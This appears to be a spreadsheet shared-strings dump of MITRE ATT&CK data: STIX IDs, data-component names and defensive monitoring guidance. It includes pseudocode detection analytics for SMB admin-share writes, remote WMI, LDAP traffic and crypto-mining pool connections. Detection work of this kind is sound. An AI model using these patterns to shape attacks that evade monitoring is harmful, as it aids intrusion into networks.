    <t>relationship--dd8a9180-706c-4ba3-88a7-e674cde96d8f</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</si>
  <si>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</si>
  <si>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relationship--8578fbb9-30c3-42e7-a23e-391eca15715b</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</si>
  <si>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</si>
  <si>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relationship--0fea5a40-0755-4e43-b85e-79c94c867627</t>
  </si>
  <si>
    <t>attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65</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</si>
  <si>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</si>
  <si>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relationship--a4651714-378a-4f7c-b4b3-4c32e3b40db1</t>
  </si>
  <si>
    <t>relationship--1865774d-02c8-4c0d-b6a7-32f196819740</t>
  </si>
  <si>
    <t>relationship--4a51b16e-fd61-49b8-b711-4fe45b147647</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</si>
  <si>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</si>
  <si>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relationship--598cdcc9-ba53-41dc-8d19-8486d9945ef2</t>
  </si>
  <si>
    <t>There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017)</t>
  </si>
  <si>
    <t>relationship--f1790353-d9cd-4c93-a1a4-625a520cdd80</t>
  </si>
  <si>
    <t>attack-pattern--98be40f2-c86b-4ade-b6fc-4964932040e5</t>
  </si>
  <si>
    <t>Monitor library load events, especially unusual creation of these binary files followed by loading into processes. Look for libraries that are not recognized or not normally loaded into a process.</t>
  </si>
  <si>
    <t>relationship--1c25229d-c0f5-4ad6-a403-874d59df73fe</t>
  </si>
  <si>
    <t>07 July 2022</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</si>
  <si>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</si>
  <si>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relationship--2be94bd5-0474-4d33-9776-cc10316d3489</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</si>
  <si>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</si>
  <si>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relationship--41c0352d-b377-4fe9-8c3a-67b78a9a388e</t>
  </si>
  <si>
    <t>attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3</t>
  </si>
  <si>
    <t>relationship--5d320f6f-7415-4c94-8c00-2fb3d0ff5036</t>
  </si>
  <si>
    <t>Named Pipe Metadata</t>
  </si>
  <si>
    <t>x-mitre-data-component--b9a1578e-8653-4103-be23-cb52e0b1816e</t>
  </si>
  <si>
    <t>Monitor for contextual data about named pipes on the system.</t>
  </si>
  <si>
    <t>relationship--03256e99-70fb-4d2d-ac8e-79294aef87dc</t>
  </si>
  <si>
    <t>Network Connection Creation</t>
  </si>
  <si>
    <t>x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly constructed network connections associated with processes performing collection activity, especially those involving abnormal/untrusted hosts. </t>
  </si>
  <si>
    <t>relationship--3b7284e5-5e4e-41bc-9e69-e37f3db66021</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</si>
  <si>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</si>
  <si>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relationship--5b872bb3-00f7-49c8-9bb1-9d157c305f51</t>
  </si>
  <si>
    <t>attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly constructed network connections that are sent or received by untrusted hosts. </t>
  </si>
  <si>
    <t>relationship--2dfdc0d8-9d81-41fb-ac7a-d85956ebf27b</t>
  </si>
  <si>
    <t>Monitor for newly constructed network connections that are sent or received by untrusted hosts.</t>
  </si>
  <si>
    <t>relationship--f0ee1b3c-23e7-46fc-a6b7-b1a633f72955</t>
  </si>
  <si>
    <t>Monitor for established network communications with anomalous IPs that have never been seen before in the environment that may indicate the download of malicious code.</t>
  </si>
  <si>
    <t>relationship--abb19a50-d9ec-4978-ab58-f4940161e1cd</t>
  </si>
  <si>
    <t>Monitor for newly constructed network connections that are sent or received by untrusted hosts, such as Sysmon Event 3 (Network connection) where Image contains CMSTP.exe and DestinationIP is external.</t>
  </si>
  <si>
    <t>relationship--11178fb7-27d1-4ad2-b912-113741647377</t>
  </si>
  <si>
    <t>attack-pattern--c3888c54-775d-4b2f-b759-75a2ececcbfd</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</si>
  <si>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</si>
  <si>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relationship--4762aa33-bcb3-49d4-b565-f8374cb9c996</t>
  </si>
  <si>
    <t>attack-pattern--0ad7bc5c-235a-4048-944b-3b286676cb74</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</si>
  <si>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</si>
  <si>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relationship--9caad98b-05ae-4aa2-87cd-387ae2e16c9d</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</si>
  <si>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</si>
  <si>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relationship--8a97476d-9e53-4212-9179-7afbab0b8915</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</si>
  <si>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 Analytic 1 -  RPC Mapper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</si>
  <si>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relationship--7d3c2752-8722-488c-9a06-7bcf308604df</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly constructed network connections to untrusted hosts that are used to send or receive data. </t>
  </si>
  <si>
    <t>relationship--fac104a4-7bd8-4e82-9d62-ca5908dc3a57</t>
  </si>
  <si>
    <t>attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b</t>
  </si>
  <si>
    <t>relationship--2f006f5c-e076-4361-a871-922663e029a2</t>
  </si>
  <si>
    <t>relationship--76c263b8-cfd9-4ad9-b1b6-f8d1184bad5c</t>
  </si>
  <si>
    <t>relationship--bdbeae2f-178a-40be-a9d4-14278f0036af</t>
  </si>
  <si>
    <t>relationship--cfb05b57-626c-474a-9678-3a0746d68276</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</si>
  <si>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</si>
  <si>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relationship--95f55522-39ba-4724-899f-b33178c6da74</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly constructed network connections that are sent or received by untrusted hosts. 
Note: Network Analysis frameworks such as Zeek can be used to capture, decode, and alert on TCP network connection creation.  </t>
  </si>
  <si>
    <t>relationship--52e03b1b-4880-4d36-95f0-10fb0cb9919e</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</si>
  <si>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</si>
  <si>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relationship--d19730a1-429d-4044-8c17-3e475033a6c2</t>
  </si>
  <si>
    <t>relationship--7de52577-a469-4d2c-8059-4c2e5c742150</t>
  </si>
  <si>
    <t>relationship--7c854772-5259-49c8-94e1-66188f2fdbb9</t>
  </si>
  <si>
    <t>Monitor for newly constructed network connections to web and cloud services associated with abnormal or non-browser processes.</t>
  </si>
  <si>
    <t>relationship--543e5a1c-f278-4a5e-afbd-5684ac314ddf</t>
  </si>
  <si>
    <t>Monitor for newly constructed network connections to cloud services associated with abnormal or non-browser processes.</t>
  </si>
  <si>
    <t>relationship--32fcbe1c-d872-46d6-a70d-90871d876610</t>
  </si>
  <si>
    <t>attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3</t>
  </si>
  <si>
    <t>relationship--69398203-a920-4617-810f-dc5be63c968c</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</si>
  <si>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</si>
  <si>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relationship--348979f0-db3e-436f-951d-ff1e2d024c61</t>
  </si>
  <si>
    <t>attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433</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</si>
  <si>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</si>
  <si>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relationship--6d52f0a1-1cdf-4773-ac40-ef9842e517d5</t>
  </si>
  <si>
    <t>attack-pattern--29ba5a15-3b7b-4732-b817-65ea8f6468e6</t>
  </si>
  <si>
    <t>Monitor for newly constructed network connections that may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution.</t>
  </si>
  <si>
    <t>relationship--ea0d80aa-9990-4968-845d-af777ac17374</t>
  </si>
  <si>
    <t>Monitor for newly constructed network connections that are sent or received by untrusted hosts or creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.</t>
  </si>
  <si>
    <t>relationship--9a76cf7c-55d7-41d4-bba8-255eef275404</t>
  </si>
  <si>
    <t>attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755</t>
  </si>
  <si>
    <t>relationship--9e564d64-f913-423f-9a44-0d35057c07c2</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</si>
  <si>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</si>
  <si>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relationship--d5b8720a-7224-4d01-8667-4700e34e79ba</t>
  </si>
  <si>
    <t>relationship--c3452c53-d5d0-42e0-873a-c57498d1cbdf</t>
  </si>
  <si>
    <t>relationship--803160d1-cb32-4de9-86bc-ffcdd6221ca1</t>
  </si>
  <si>
    <t>attack-pattern--84e02621-8fdf-470f-bd58-993bb6a89d91</t>
  </si>
  <si>
    <t>relationship--9d87ee89-8724-4c23-8074-3d62141ebf37</t>
  </si>
  <si>
    <t>attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d</t>
  </si>
  <si>
    <t>relationship--99cb12cb-5d0b-4afe-9f8b-81bcdf8ed486</t>
  </si>
  <si>
    <t>attack-pattern--52759bf1-fe12-4052-ace6-c5b0cf7dd7fd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</si>
  <si>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</si>
  <si>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relationship--435e156b-0d65-4920-ae12-f833d2005427</t>
  </si>
  <si>
    <t>attack-pattern--9c99724c-a483-4d60-ad9d-7f004e42e8e8</t>
  </si>
  <si>
    <t>relationship--995637ef-4066-4254-87bf-a03d8e53de9c</t>
  </si>
  <si>
    <t>attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd</t>
  </si>
  <si>
    <t>relationship--384ef910-fabc-4e87-ad19-8f632b69851c</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</si>
  <si>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</si>
  <si>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relationship--5d82a197-44f8-46ab-a604-b66569022604</t>
  </si>
  <si>
    <t>attack-pattern--4fe28b27-b13c-453e-a386-c2ef362a573b</t>
  </si>
  <si>
    <t>relationship--f9db15af-c5c9-4978-bcf8-0c02a5dce618</t>
  </si>
  <si>
    <t>attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea</t>
  </si>
  <si>
    <t>relationship--a8175a1f-5172-4d2f-9eb8-4353ef366638</t>
  </si>
  <si>
    <t>relationship--b4457aad-3021-4413-80a9-2ddb1210f111</t>
  </si>
  <si>
    <t>attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7</t>
  </si>
  <si>
    <t>relationship--e071665f-e6a6-4d73-bd09-2c5d93655486</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</si>
  <si>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</si>
  <si>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relationship--68c1cb6c-a3c5-4b54-9f74-eb26cc4a0c50</t>
  </si>
  <si>
    <t>relationship--fe53f672-fc19-4da2-8e78-b8fd3cf05aea</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</si>
  <si>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Note: Network Analysis frameworks such as Zeek can be used to capture, decode, and alert on network service protocols such as SSH and RDP.
&lt;h4&gt;Analytic 1 - Suspicious Protocols&lt;/h4&gt;
&lt;code&gt;suspicious_protocol = filter network_traffic where ((server_port = “636” AND protocol = “6”) OR (server_port = “389” AND protocol = “17”))&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--76529ecd-8925-4dab-be29-45705fa233b4</t>
  </si>
  <si>
    <t>Monitor for newly constructed network connections associated with pings/scans that may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system.</t>
  </si>
  <si>
    <t>relationship--ae2ab384-8c0c-4618-bdb8-401024d1b216</t>
  </si>
  <si>
    <t>Monitor for newly constructed network connections that are sent or received by untrusted hosts, look for connections to/from strange ports, as well as reputation of IPs and URLs related cryptocurrency hosts. 
Note: Destination Host Name is not a comprehensive list of potential cryptocurrency URLs. 
&lt;h4&gt;Analytic 1 - Suspicious Port Connections&lt;/h4&gt;
&lt;code&gt;suspicious_netcoms = filter network traffic where ((src_port = “3333” OR src_port = “4444” OR src_port = “5555” OR src_port = “6666”) AND 
(dst_host_name = “cryptmonero.com” OR dst_host_name = “crypto-pool.fr” OR dst_host_name = “crypto-pool.info” OR dst_host_name = “cryptonight-hub.miningpoolhub.com”))&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--8990db18-edc0-4634-b62f-840baf1dd231</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</si>
  <si>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Analytic 1 is indication of an SMB file write to a Windows Admin File Share: ADMIN$ or C$
- Analytic 2 is observed originating from the same host, regardless of write-attempts and regardless of whether or not any connection is successful —just connection attempts— within a specified period of time.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&lt;h4&gt; Analytic 1 - Basic&lt;/h4&gt; 
&lt;code&gt;suspicious_smb_traffic = filter log_events where (
(event_id == "smb2_write_request" OR event_type == "smb1_write_andx_response") AND (connection.smb_state.path == "ADMIN$" OR connection.smb_state.path == "C$"))&lt;/code&gt;
&lt;h4&gt;Analytic 2 - Multiple Attempts (Time Window)&lt;/h4&gt;
&lt;code&gt;suspicious_smb_traffic = filter log_events where ( 
(event_type == "smb2_tree_connect_request" OR event_type == "smb1_tree_connect_andx_request") AND (connection.smb_state.path == "ADMIN$" OR connection.smb_state.path == "C$") REPEATS 5 TIMES WITHIN 5 MINUTES FROM SAME src_ip ) &lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--a7add7de-11f5-44df-b9c3-3cd431b970be</t>
  </si>
  <si>
    <t>attack-pattern--ee7ff928-801c-4f34-8a99-3df965e581a5</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</si>
  <si>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</si>
  <si>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relationship--046c954e-eaf9-4634-b55d-c8e7061d1ad2</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</si>
  <si>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</si>
  <si>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relationship--422117d9-fb54-42cb-9143-586900cd32cd</t>
  </si>
  <si>
    <t>attack-pattern--4eeaf8a9-c86b-4954-a663-9555fb406466</t>
  </si>
  <si>
    <t>relationship--d6f20ae9-c2ca-4b60-ab03-5c0a8023fba7</t>
  </si>
  <si>
    <t>attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520</t>
  </si>
  <si>
    <t>Monitor recently started applications creating raw socket connections.(Citation: crowdstrike bpf socket filters)</t>
  </si>
  <si>
    <t>relationship--a17442af-783f-4d6d-a52e-21b9bd784173</t>
  </si>
  <si>
    <t>relationship--22c8877f-3819-4345-8a42-45f2192c086a</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</si>
  <si>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</si>
  <si>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relationship--3b805001-baef-4237-8c26-922aeac6af86</t>
  </si>
  <si>
    <t>attack-pattern--dc31fe1e-d722-49da-8f5f-92c7b5aff534</t>
  </si>
  <si>
    <t>relationship--440eeebd-bbb0-476c-8291-b71fe95e0843</t>
  </si>
  <si>
    <t>attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly constructed network connections that are sent or received by abnormal or untrusted hosts. </t>
  </si>
  <si>
    <t>relationship--3241ecc8-878c-4fb5-bd0d-6fdfb3b34859</t>
  </si>
  <si>
    <t>attack-pattern--451a9977-d255-43c9-b431-66de80130c8c</t>
  </si>
  <si>
    <t>relationship--5e22a5b4-49cf-4dfe-9a08-3e29b94c2eb8</t>
  </si>
  <si>
    <t>relationship--71b17443-ce0b-47c1-bd6a-ec76b95e9211</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</si>
  <si>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</si>
  <si>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relationship--d59832f1-fd7b-4192-8be6-7c1caeb66284</t>
  </si>
  <si>
    <t>attack-pattern--830c9528-df21-472c-8c14-a036bf17d665</t>
  </si>
  <si>
    <t>relationship--beed216e-8c4c-4b0d-86b0-85df120cacf7</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</si>
  <si>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&lt;h4&gt; Analytic 1 - Remote WMI over RPC&lt;/h4&gt;
&lt;code&gt;wmi_flow = filter network_flow where (dest_port == 135 and proto_info.rpc_interface == "IRemUnknown2")&lt;/code&gt;
&lt;h4&gt; Analytic 2 : Remotely Launched Executables via WMI&lt;/h4&gt;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t>
  </si>
  <si>
    <t>relationship--53b93d5c-8f99-43a0-a356-378ad61634d6</t>
  </si>
  <si>
    <t xml:space="preserve">
Monitor for newly constructed network connections using Windows Remote Management (WinRM), such as remote WMI connection attempts (typically over port 5985 when using HTTP and 5986 for HTTPS).</t>
  </si>
  <si>
    <t>relationship--92f4c657-bc3a-499c-adc0-590cd61617e3</t>
  </si>
  <si>
    <t>Network Share Access</t>
  </si>
  <si>
    <t>x-mitre-data-component--f5468e67-51c7-4756-9b4f-65707708e7fa</t>
  </si>
  <si>
    <t>Monitor for unexpected network shares being accessed on target systems or on large numbers of systems.</t>
  </si>
  <si>
    <t>relationship--8b1a306d-5437-4589-8f03-05290d131b0a</t>
  </si>
  <si>
    <t>Monitor for unexpected and abnormal accesses to network shares.</t>
  </si>
  <si>
    <t>relationship--1559cb81-bdb5-4662-a061-eca96e6b7a63</t>
  </si>
  <si>
    <t>Monitor for unexpected network share access, such as files transferred between shares within a network using protocols such as SMB.</t>
  </si>
  <si>
    <t>relationship--4dab3ea7-8907-4376-9d17-2b9fa43acaa9</t>
  </si>
  <si>
    <t>Monitor interactions with network shares, such as reads or file transfers, using remote services such as Server Message Block (SMB).</t>
  </si>
  <si>
    <t>relationship--91537671-343b-4e35-8196-bf5178726cc2</t>
  </si>
  <si>
    <t>Monitor interactions with network shares, such as reads or file transfers, using Server Message Block (SMB).</t>
  </si>
  <si>
    <t>relationship--5ea94ba6-e92f-472b-9c83-392234f96fd6</t>
  </si>
  <si>
    <t>13 April 2022</t>
  </si>
  <si>
    <t>Monitor for unexpected and abnormal accesses to network shares, especially those also associated with file activity.</t>
  </si>
  <si>
    <t>relationship--57f65eb3-1f1e-4a09-af1a-6a6c4380cbc9</t>
  </si>
  <si>
    <t>Network Traffic Content</t>
  </si>
  <si>
    <t>x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c</t>
  </si>
  <si>
    <t>attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213</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</si>
  <si>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</si>
  <si>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relationship--51adca8c-07a6-4f5b-a443-682e27a289f6</t>
  </si>
  <si>
    <t>attack-pattern--67073dde-d720-45ae-83da-b12d5e73ca3b</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</si>
  <si>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</si>
  <si>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relationship--8a184c95-8162-4a46-94f4-7734fe09904a</t>
  </si>
  <si>
    <t>Monitor network traffic for anomalies associated with known AiTM behavior.</t>
  </si>
  <si>
    <t>relationship--18b2b3f9-8ed6-44e3-804e-ee0acc3457fb</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</si>
  <si>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</si>
  <si>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relationship--448cb735-65c8-4346-a97d-1ea31e9b6c11</t>
  </si>
  <si>
    <t>attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6</t>
  </si>
  <si>
    <t>relationship--4944ba6e-f70d-4b3b-8ddb-f67209a57afc</t>
  </si>
  <si>
    <t>relationship--829983b8-86ba-48e7-97cb-bad42fd3e888</t>
  </si>
  <si>
    <t>attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada</t>
  </si>
  <si>
    <t>relationship--19dba754-be06-40ab-a11d-96ef1cb20eff</t>
  </si>
  <si>
    <t>Monitor network traffic content for evidence of data exfiltration, such as gratuitous or anomalous outbound traffic containing collected data. Consider correlation with process monitoring and command lines associated with collection and exfiltration.</t>
  </si>
  <si>
    <t>relationship--3efc2e37-4179-42d6-89c8-f48dc4d9a8a7</t>
  </si>
  <si>
    <t>relationship--1d1a9167-94a9-41bf-b234-5b4bccfa970c</t>
  </si>
  <si>
    <t>Monitor for network traffic associated with requests and/or downloads of container images, especially those that may be anomalous or known malicious.</t>
  </si>
  <si>
    <t>relationship--5f2d57af-857e-4912-85a7-5d0a96ee9a64</t>
  </si>
  <si>
    <t>attack-pattern--81033c3b-16a4-46e4-8fed-9b030dd03c4a</t>
  </si>
  <si>
    <t>relationship--89aa1b4b-e801-41f7-b32b-16dc6dbb1032</t>
  </si>
  <si>
    <t>Monitor for other unusual network traffic that may indicate additional malicious content transferred to the system. Use network intrusion detection systems, sometimes with SSL/TLS inspection, to look for known malicious payloads, content obfuscation, and exploit code.</t>
  </si>
  <si>
    <t>relationship--35dd502a-97a0-4aa2-a162-aa8a49a9e043</t>
  </si>
  <si>
    <t>relationship--136567c9-f4fe-40c3-a4c2-cd7538cd49a1</t>
  </si>
  <si>
    <t>Monitor network traffic for suspicious/malicious behavior involving DHCP, such as changes in DNS and/or gateway parameters. Additionally, monitor network traffic for rogue DHCPv6 activity.</t>
  </si>
  <si>
    <t>relationship--b83dc94a-1fd6-4c07-8f8e-fc9479b00346</t>
  </si>
  <si>
    <t>attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72</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</si>
  <si>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</si>
  <si>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relationship--2d48265a-b415-4518-bf98-63233819b7f3</t>
  </si>
  <si>
    <t>17 June 2022</t>
  </si>
  <si>
    <t>attack-pattern--83a766f8-1501-4b3a-a2de-2e2849e8dfc1</t>
  </si>
  <si>
    <t>relationship--aef318b0-ef4a-412b-b241-d9cc58f8d924</t>
  </si>
  <si>
    <t>attack-pattern--cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f</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</si>
  <si>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</si>
  <si>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relationship--b7be4fa3-8615-4e53-bb96-5e6e9f88cdc1</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for networks that solicits and obtains the configuration information of the queried device. </t>
  </si>
  <si>
    <t>relationship--65fd090e-9c3f-4f6c-ae7c-b218811a475f</t>
  </si>
  <si>
    <t>attack-pattern--ad255bfe-a9e6-4b52-a258-8d3462abe842</t>
  </si>
  <si>
    <t>relationship--aed66fc1-f158-4518-8b33-8b95cbe5d168</t>
  </si>
  <si>
    <t>Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g. unauthorized, gratuitous, or anomalous traffic patterns attempting to access configuration content)</t>
  </si>
  <si>
    <t>relationship--07e9d03d-d2e4-449c-b26b-e28548ba052e</t>
  </si>
  <si>
    <t>relationship--9820c40c-9c87-453f-b043-7ed97edb44c4</t>
  </si>
  <si>
    <t>attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7</t>
  </si>
  <si>
    <t>relationship--9a20877d-8741-4d11-89c2-549ab3f8aed5</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</si>
  <si>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</si>
  <si>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relationship--1fb13108-14d6-498a-b474-c7fb71a3a586</t>
  </si>
  <si>
    <t>01 June 2022</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</si>
  <si>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</si>
  <si>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relationship--29b86468-2995-4f6c-8269-7befe9e80f2e</t>
  </si>
  <si>
    <t>attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2</t>
  </si>
  <si>
    <t>relationship--c5caa197-e990-4214-ae50-7abeb5df199f</t>
  </si>
  <si>
    <t>relationship--83a9bc01-3aed-4aa7-b0f9-fad05158e169</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</si>
  <si>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</si>
  <si>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relationship--24dcf8ae-d50b-4b5d-9600-7f2dd7a22829</t>
  </si>
  <si>
    <t>relationship--9ef81bca-b60b-4c39-91ca-38a7f5e676d9</t>
  </si>
  <si>
    <t>attack-pattern--69f897fd-12a9-4c89-ad6a-46d2f3c38262</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</si>
  <si>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</si>
  <si>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relationship--205fcd17-c115-4bdb-8a05-6b4b4299854d</t>
  </si>
  <si>
    <t>attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118</t>
  </si>
  <si>
    <t>relationship--be301c77-e0ae-4207-9808-e4037be573f5</t>
  </si>
  <si>
    <t>relationship--72998c1e-2455-49f4-bb03-5ffae89433b5</t>
  </si>
  <si>
    <t>attack-pattern--cdfc5f0a-9bb9-4352-b896-553cfa2d8fd8</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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relationship--a54b034b-75c1-4f83-b587-ef81b03b8444</t>
  </si>
  <si>
    <t>relationship--0a18bfb9-582b-4a4f-8553-86f12014e99e</t>
  </si>
  <si>
    <t>relationship--b84cc63e-63c5-4478-897b-9237b4820f36</t>
  </si>
  <si>
    <t>attack-pattern--ba04e672-da86-4e69-aa15-0eca5db25f43</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor and analyze network traffic for exfiltration attempts using text storage sites, i.e. POST requests to text storage sites. </t>
  </si>
  <si>
    <t>relationship--3f5887ba-0ed2-4730-8a8c-99a6eb04b788</t>
  </si>
  <si>
    <t>Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection strings or known payloads.</t>
  </si>
  <si>
    <t>relationship--577e10be-95b2-448c-bd12-1ee31f9514b6</t>
  </si>
  <si>
    <t>Use deep packet inspection to look for artifacts of common exploit traffic, such as known payloads.</t>
  </si>
  <si>
    <t>relationship--24c0cb46-b5c4-469f-9263-9a99117cb4ed</t>
  </si>
  <si>
    <t>relationship--d80c873c-922e-4c19-b84b-e5a3eb56f5b7</t>
  </si>
  <si>
    <t>relationship--95ef5734-a617-44c1-aee8-bddfadaab6d1</t>
  </si>
  <si>
    <t>relationship--efb5d6d2-0c4a-4520-a63e-8ebff3dcd593</t>
  </si>
  <si>
    <t>attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b</t>
  </si>
  <si>
    <t>relationship--75ec1c68-2e16-41fd-b1e6-8606534bbc2b</t>
  </si>
  <si>
    <t>For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.</t>
  </si>
  <si>
    <t>relationship--e3962e89-9259-48e4-a8e4-965563736281</t>
  </si>
  <si>
    <t>attack-pattern--5282dd9a-d26d-4e16-88b7-7c0f4553daf4</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</si>
  <si>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</si>
  <si>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relationship--4687eeee-4a8c-4b7d-adfc-557598e3795d</t>
  </si>
  <si>
    <t>21 April 2022</t>
  </si>
  <si>
    <t>relationship--c5067d25-32aa-42cd-8fe2-93a66596268d</t>
  </si>
  <si>
    <t>relationship--f602a8fc-5175-4bfe-a21d-1602d4c5c1ed</t>
  </si>
  <si>
    <t>Monitor network traffic content for files and other potentially malicious content, especially data coming in from abnormal/unknown domain and IPs.</t>
  </si>
  <si>
    <t>relationship--3458724f-910b-49a8-9810-836b4e1436bc</t>
  </si>
  <si>
    <t>relationship--5a49f6f3-7820-4be1-90b3-5c559745b04c</t>
  </si>
  <si>
    <t>relationship--8d79f82f-6285-4950-afae-c5f8095ee0a1</t>
  </si>
  <si>
    <t>relationship--442cf157-2812-4c62-8a6c-c12c6a207b1c</t>
  </si>
  <si>
    <t>attack-pattern--f7c0689c-4dbd-489b-81be-7cb7c7079ade</t>
  </si>
  <si>
    <t>relationship--81b1a6cd-2910-4fd2-997e-c45c52a8571b</t>
  </si>
  <si>
    <t>attack-pattern--650c784b-7504-4df7-ab2c-4ea882384d1e</t>
  </si>
  <si>
    <t>Monitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.</t>
  </si>
  <si>
    <t>relationship--aec8bec0-d7ee-41a8-aef6-9ea18b1b59ab</t>
  </si>
  <si>
    <t>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 Analytic 1 and 2 are very similar, with the key difference being that Implementation 2 is intended to capture multiple attempts at lateral movement originating from the same host within a short time period (5 minutes).
&lt;h4&gt; Analytic 1 - Basic &lt;/h4&gt;
&lt;code&gt; suspicious_smb_traffic = filter log_events where (
(event_id == "smb2_write_response" OR event_id == "smb1_write_response" OR event_id == "smb1_write_andx_response") AND (connection.smb_state.path == "ADMIN$" OR connection.smb_state.path == "C$") )&lt;/code&gt;
&lt;h4&gt;Analytic 2 - Multiple Attempts (Time Window)&lt;/h4&gt;
&lt;code&gt;suspicious_smb_traffic = filter log_events where (
(event_id == "smb2_write_response" OR event_id == "smb1_write_response" OR event_id == "smb1_write_andx_response") AND (connection.smb_state.path == "ADMIN$" OR connection.smb_state.path == "C$") REPEATS 5 TIMES WITHIN 5 MINUTES FROM SAME src_ip)&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--fb5dd1fa-5e99-4cde-9670-151ec75afc59</t>
  </si>
  <si>
    <t>attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b</t>
  </si>
  <si>
    <t>relationship--16d9950c-e4fe-4488-9256-8e00a9b706a0</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</si>
  <si>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</si>
  <si>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relationship--854c6087-6c6c-4450-b931-2613f664594d</t>
  </si>
  <si>
    <t>relationship--5042a260-b7f4-4853-bbd9-089c2ef680cc</t>
  </si>
  <si>
    <t>attack-pattern--4ffc1794-ec3b-45be-9e52-42dbcb2af2de</t>
  </si>
  <si>
    <t>relationship--6f6fe3e5-c2e6-4296-86f8-bac5e993301b</t>
  </si>
  <si>
    <t>attack-pattern--b8017880-4b1e-42de-ad10-ae7ac6705166</t>
  </si>
  <si>
    <t>relationship--3e7e5626-7662-4a51-8dfe-e7fecd368750</t>
  </si>
  <si>
    <t>Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g. unauthorized, gratuitous, or anomalous traffic patterns attempting to access network configuration content)</t>
  </si>
  <si>
    <t>relationship--8217d878-2b53-472d-bcf0-c22c5d1af1bc</t>
  </si>
  <si>
    <t>Monitoring for SMB traffic between systems may also be captured and decoded to look for related network share session and file transfer activity.</t>
  </si>
  <si>
    <t>relationship--2a54bde2-8f9d-4b1c-b6d0-08c778a1bcec</t>
  </si>
  <si>
    <t>attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b</t>
  </si>
  <si>
    <t>relationship--53f4758c-ffc1-4e93-8eb0-bd3f664de7d1</t>
  </si>
  <si>
    <t>attack-pattern--d467bc38-284b-4a00-96ac-125f447799fc</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</si>
  <si>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</si>
  <si>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relationship--9dd218c9-f055-48fa-acfc-7f7e7d15bb6d</t>
  </si>
  <si>
    <t>attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18</t>
  </si>
  <si>
    <t>Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.</t>
  </si>
  <si>
    <t>relationship--c4221728-ce93-438c-93cd-133b6176abee</t>
  </si>
  <si>
    <t>relationship--04ec1e09-f29e-44f7-bcb1-820b01af2155</t>
  </si>
  <si>
    <t>relationship--8a1fcd61-313a-4775-a532-d99dad70fe34</t>
  </si>
  <si>
    <t>relationship--aacb14e6-056f-4df4-8b9c-58a36076b1ad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</si>
  <si>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</si>
  <si>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relationship--cac67507-5bb1-4552-a240-db06cf926663</t>
  </si>
  <si>
    <t>relationship--077ce3ec-2414-4a56-a74f-c938415c102b</t>
  </si>
  <si>
    <t>attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc</t>
  </si>
  <si>
    <t>relationship--9f631f84-8bc5-4312-8325-7f97ab55d742</t>
  </si>
  <si>
    <t>relationship--dda7159b-33a3-4788-a080-0cf3cb354d88</t>
  </si>
  <si>
    <t>relationship--16e6f7a7-500f-4af0-8fc1-4e22385a23e9</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</si>
  <si>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</si>
  <si>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relationship--d2ddc824-b2d8-46b8-9f75-d592357620db</t>
  </si>
  <si>
    <t>relationship--ccb94ba8-3384-40cf-a810-ab4a2423c54d</t>
  </si>
  <si>
    <t>relationship--59e64b14-27eb-46aa-ae75-863602253e77</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</si>
  <si>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</si>
  <si>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relationship--52295ccb-0df2-4395-8bed-1c561c3a9f59</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</si>
  <si>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</si>
  <si>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relationship--4e30f971-39f5-4462-ba81-017247f5ffd9</t>
  </si>
  <si>
    <t>relationship--49e6c2b4-7f2c-4a67-8e6e-82c06831ea5f</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</si>
  <si>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</si>
